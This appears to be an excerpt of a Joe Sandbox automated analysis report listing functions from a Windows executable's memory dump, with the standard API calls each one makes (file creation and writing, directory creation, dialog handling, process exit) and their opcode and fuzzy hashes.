Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeap
String ID:
API String ID: 3475569825-0
Opcode ID: aa68cc1c79c702716038aa117c22782f6525d494205ed7a6e78d6060a6e5c0ca
Instruction ID: 76c6b1377fcd4a9141cdd07a1220be32cd15f524cb8873ef4c9cf7be2aa2894a
Opcode Fuzzy Hash: aa68cc1c79c702716038aa117c22782f6525d494205ed7a6e78d6060a6e5c0ca
Instruction Fuzzy Hash: ADA1A173B1878187EF248F21D8413796BA9FB44BA8F044235DA5D86BD4EF3ED6049709

Function 00007FF6EF6C821C Relevance: 4.7, APIs: 3, Instructions: 214COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6EF6C82F1
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6EF6C830D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 0b47e82709621adf6230fe8a0c560c713c59235585da1626e62420d459340151
Instruction ID: 3394899577ca23ddea8dfb15e565380cac3652f50e528dec1a1b9272ed4ebdb5
Opcode Fuzzy Hash: 0b47e82709621adf6230fe8a0c560c713c59235585da1626e62420d459340151
Instruction Fuzzy Hash: 9781F423A08A8287EF64DF21D5043B97768FB44B84F598031DB8D8B799DF3EE6419309

Function 00007FF6EF6BD0F4 Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,00000000,?,?,00007FF6EF6C125A,?,?,?,00007FF6EF6CAD3D), ref: 00007FF6EF6BD12E
WriteFile.KERNEL32 ref: 00007FF6EF6BD178
WriteFile.KERNELBASE ref: 00007FF6EF6BD1A5

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: a970b05bbadaef60ae85348f850f653ba86195160c7e1160da1fe296ddd01ded
Instruction ID: d13319070a8d223de13c2140b4c5498162f312b616dddbf0dc907c08e86602db
Opcode Fuzzy Hash: a970b05bbadaef60ae85348f850f653ba86195160c7e1160da1fe296ddd01ded
Instruction Fuzzy Hash: CB412B27A0CA5293EB24CF24E9147B92364FF44B98F044431EB4D8BA98CF3EE556D705

Function 00007FF6EF6BD6EC Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD734
CreateDirectoryW.KERNEL32(00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD769
GetLastError.KERNEL32(00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD786

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: c509ee56912e0ed8a096a77351797c46b0935274de5d5c8b26b24dc22b5557b9
Instruction ID: cf7c8785d8ccf1530e056101d7823a1d1dc0aec73bad9232b18be3c736912f96
Opcode Fuzzy Hash: c509ee56912e0ed8a096a77351797c46b0935274de5d5c8b26b24dc22b5557b9
Instruction Fuzzy Hash: 5221F623A1C64243FB70AF2595413FD2359AF857D4F040831F94DCA2D9DF6FE585A60A

Function 00007FF6EF6D52B0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6C2948: LoadStringW.USER32 ref: 00007FF6EF6C29CF
Part of subcall function 00007FF6EF6C2948: LoadStringW.USER32 ref: 00007FF6EF6C29E8

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D52F0
SetDlgItemTextW.USER32 ref: 00007FF6EF6D5306
SetWindowTextW.USER32 ref: 00007FF6EF6D530C

Part of subcall function 00007FF6EF6D2090: PeekMessageW.USER32 ref: 00007FF6EF6D20A6
Part of subcall function 00007FF6EF6D2090: GetMessageW.USER32 ref: 00007FF6EF6D20BD
Part of subcall function 00007FF6EF6D2090: IsDialogMessageW.USER32 ref: 00007FF6EF6D20D4
Part of subcall function 00007FF6EF6D2090: TranslateMessage.USER32 ref: 00007FF6EF6D20E3
Part of subcall function 00007FF6EF6D2090: DispatchMessageW.USER32 ref: 00007FF6EF6D20EE

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Message$LoadStringText$DialogDispatchItemPeekTranslateWindowswprintf
String ID:
API String ID: 1010759681-0
Opcode ID: 5fc12fbf829ac9eb82e241ccbda5c806d037b597829fcb6a2fe34066050df77d
Instruction ID: cfdad764cce059ecd677d79bb48685ac1c7712789f94fb29fe9fe26b9c04da3e
Opcode Fuzzy Hash: 5fc12fbf829ac9eb82e241ccbda5c806d037b597829fcb6a2fe34066050df77d
Instruction Fuzzy Hash: 1CF0C257A1C68247FA106B60E8113E92394BF88384F800031F98D873A2DE2FE2518B0A

Function 00007FF6EF6E0408 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6EF6E03EC), ref: 00007FF6EF6E0430
TerminateProcess.KERNEL32(?,?,?,00007FF6EF6E03EC), ref: 00007FF6EF6E043B
ExitProcess.KERNEL32 ref: 00007FF6EF6E044A

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d7b4fcf76b33b70473447b9cedc717a565b400a7f64c403ea979d858785ee2ed
Instruction ID: 9d3360a9c5b2f5441296ec3632ca2a9a77e4902af71754e1cdacc04d53b0e465
Opcode Fuzzy Hash: d7b4fcf76b33b70473447b9cedc717a565b400a7f64c403ea979d858785ee2ed
Instruction Fuzzy Hash: 2CE01A27B04305D7EE14AB619D81779235A9FC8B41F004138C80E873A2CE3FA64DA307

Function 00007FF6EF6E483C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF6EF6E4872

Strings

, xrefs: 00007FF6EF6E48B7

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: bac15ddce867e0a1e863a11a7079234ebc720208b27a2c3926ac389e887c3f34
Instruction ID: 1f5bc68917c31b30e3e22587918a70ff755a26aa68772043f84fc3110635c02a
Opcode Fuzzy Hash: bac15ddce867e0a1e863a11a7079234ebc720208b27a2c3926ac389e887c3f34
Instruction Fuzzy Hash: AF518C77A1C2C18BE7218F38D4443AE7BA4F748748F544136E68D87A86CF7AD246DB05

Function 00007FF6EF6E3C4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 00007FF6EF6E3D1A

Strings

LCMapStringEx, xrefs: 00007FF6EF6E3C6D, 00007FF6EF6E3C7E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 1e17f4cee329f729a4cd225e223d4fe21f5d41a04b2378488f210279b6c12dbb
Instruction ID: 51126d9a7c1bfae06d9e74ebe933d79e6e3f1e8435221c51a79f1d4b37613120
Opcode Fuzzy Hash: 1e17f4cee329f729a4cd225e223d4fe21f5d41a04b2378488f210279b6c12dbb
Instruction Fuzzy Hash: B7212A37A08B8583DA60CB56F84026AB7A4FBC8BC4F144136DE8D83B68DE3DD545DB04

Function 00007FF6EF6E3BD4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF6EF6E2E01), ref: 00007FF6EF6E3C31

Strings

InitializeCriticalSectionEx, xrefs: 00007FF6EF6E3BEB, 00007FF6EF6E3BFE

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 2c429491ec8747b6a626657169381bb8c0026c5a015cd3a8bc3a0a1640857e88
Instruction ID: c4d1f77f5eff503d2904b5a9514977a85570c1a2ccbeeb00d053ea8876cce993
Opcode Fuzzy Hash: 2c429491ec8747b6a626657169381bb8c0026c5a015cd3a8bc3a0a1640857e88
Instruction Fuzzy Hash: 36F08127B08B85C3EB049F42B4401797765AB89BC0F945035EA4D47B14DE3EE545D705

Function 00007FF6EF6E3A64 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,00007FF6EF6E1A30), ref: 00007FF6EF6E3AA8

Strings

FlsAlloc, xrefs: 00007FF6EF6E3A71, 00007FF6EF6E3A84

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5a1af9dab99bba9a6cb0066968623d5ceb271645f962abe96446c83537b1644d
Instruction ID: d0bd673be8b353799e2002036024994c8a63a7d3663c62db0863324a95e22bf1
Opcode Fuzzy Hash: 5a1af9dab99bba9a6cb0066968623d5ceb271645f962abe96446c83537b1644d
Instruction Fuzzy Hash: CDE03013B08746D3EE459B56F9512B817689F467C4F941031D91D47360EE2EE689D30A

Function 00007FF6EF6E4CC8 Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6E472C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF6EF6E4A49,?,?,?,?,?,?,?,00007FF6EF6E4BF9), ref: 00007FF6EF6E4756

IsValidCodePage.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF6EF6E4AFC,?,?,?,?,?,?,?,00007FF6EF6E4BF9), ref: 00007FF6EF6E4D42
GetCPInfo.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF6EF6E4AFC,?,?,?,?,?,?,?,00007FF6EF6E4BF9), ref: 00007FF6EF6E4D57

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 1553bcfc5aca4ca800b5f203275528867a3a5bf56541edb4c2be03593f351a34
Instruction ID: 0d4410700b86e82de3f79b6bf90fa89925c1695dcbe3abf6828a38c6371dd887
Opcode Fuzzy Hash: 1553bcfc5aca4ca800b5f203275528867a3a5bf56541edb4c2be03593f351a34
Instruction Fuzzy Hash: C081C167E0C69287E7648F35984037877A9EB40B80F598131DA8DC7694DE3FEA41E34A

Function 00007FF6EF6C8324 Relevance: 3.1, APIs: 2, Instructions: 110COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6EF6C84B9
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6EF6C84D5

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 618c69e4fb568312681faad741d6b8e769d3b256376b7328c2c0ecb3efb9c953
Instruction ID: 87b008349ce6bdef191d8cc0c944dac67220499063de720c107b8c2739c49ba8
Opcode Fuzzy Hash: 618c69e4fb568312681faad741d6b8e769d3b256376b7328c2c0ecb3efb9c953
Instruction Fuzzy Hash: 8F419E63A08A8247EF60EF31D1403B97768AF54B84F494531DB8D8B799DF3EE641930A

Function 00007FF6EF6BCB94 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000001,?,?,?,00007FF6EF6BCB69), ref: 00007FF6EF6BCCC6
GetLastError.KERNEL32(?,00000001,?,?,?,00007FF6EF6BCB69), ref: 00007FF6EF6BCCD5

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fd696965cc74116d374b50372c7714ac3cfe2692967d93b440dc49aca272c4b1
Instruction ID: a6c9b1b35191896213d27b7010b78746c61fb3f8ced9915013cdc763bba587d7
Opcode Fuzzy Hash: fd696965cc74116d374b50372c7714ac3cfe2692967d93b440dc49aca272c4b1
Instruction Fuzzy Hash: 12313823B1964283EA604F29D9447781368AF54BD4F140931FE1CC7798DF2FE641A706

Function 00007FF6EF6B23C0 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6EF6B23EE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6EF6B23F4

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: ec79624c46bc47e7d42d1b2591c92fcff0b3d36e474fb898bdabfb43df807e29
Instruction ID: 9f7bb15bcf603bc77ca55c321052e4605fbb9cca5ebca443996a26248be4d540
Opcode Fuzzy Hash: ec79624c46bc47e7d42d1b2591c92fcff0b3d36e474fb898bdabfb43df807e29
Instruction Fuzzy Hash: D631A533A09B8243EA19AB11E54036963E9EF447E0F544B34E7BE47BDDEE2DE0909305

Function 00007FF6EF6BC688 Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF6EF6BC71C
CreateFileW.KERNEL32 ref: 00007FF6EF6BC769

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d1154827a2bd690f80419550eff16fed19451c218b2921c8879e33f9bf465373
Instruction ID: 810d768b607f307a918cc3c2ca207b9345192019a3c6a05a2d3c6a510271a7e5
Opcode Fuzzy Hash: d1154827a2bd690f80419550eff16fed19451c218b2921c8879e33f9bf465373
Instruction Fuzzy Hash: 6C313573A1864147EB708F20E4047A93754BB457B8F005331EEAC876C9EF7ED545AB4A

Function 00007FF6EF6BCEE0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF6EF6BCF0E
SetFileTime.KERNELBASE ref: 00007FF6EF6BCFAB

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e97e05df5904ee765d6b699a289decc8c7c4cd8133a24b8a836e434f42861f76
Instruction ID: 32f527f7837be8253d21dc6a99d1a6c5a60d0ea843633f3a62245b5ec255388b
Opcode Fuzzy Hash: e97e05df5904ee765d6b699a289decc8c7c4cd8133a24b8a836e434f42861f76
Instruction Fuzzy Hash: 86214423E0D74253EE218B11D400376579CAF45796F444571EE4C47299EF3EEA86E20A

Function 00007FF6EF6BCFC0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF6EF6BD021
